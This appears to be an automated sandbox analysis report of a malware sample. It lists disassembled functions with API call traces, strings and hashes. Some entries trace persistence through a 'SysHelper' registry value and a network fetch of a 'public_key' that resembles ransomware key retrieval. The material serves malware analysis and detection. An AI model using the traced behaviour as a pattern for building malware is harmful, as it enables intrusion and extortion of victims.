                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                                                                                        • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                                                        • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041E707
                                                                                                                                                                                                                                          • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                                                                                                                                                        • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                                                                                        • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                                                        • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                                                                                        • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                                                                                                        • API String ID: 1302938615-3129329331
                                                                                                                                                                                                                                        • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                                                                                                        • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___unDName.LIBCMT ref: 0043071B
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 0043072E
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0043074A
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0043075C
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0043076D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004307B6
                                                                                                                                                                                                                                          • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004307AF
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                                                                                                                        • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                                                                                                                                                                        • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00411B1E
                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00411B29
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00411B78
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                                                                                        • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                                                        • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                                                                                                                        • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                                                                                                                        • __initptd.LIBCMT ref: 00425196
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                                                                                        • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                                                                                                        • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0042594A
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00425970
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425989
                                                                                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004259C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                                                                                        • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                                                        • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                                                                                        • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                                                                                                        • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                                                                                                                                                        • API String ID: 2102423945-3653307630
                                                                                                                                                                                                                                        • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                                                        • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                                                                                                                                                          • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
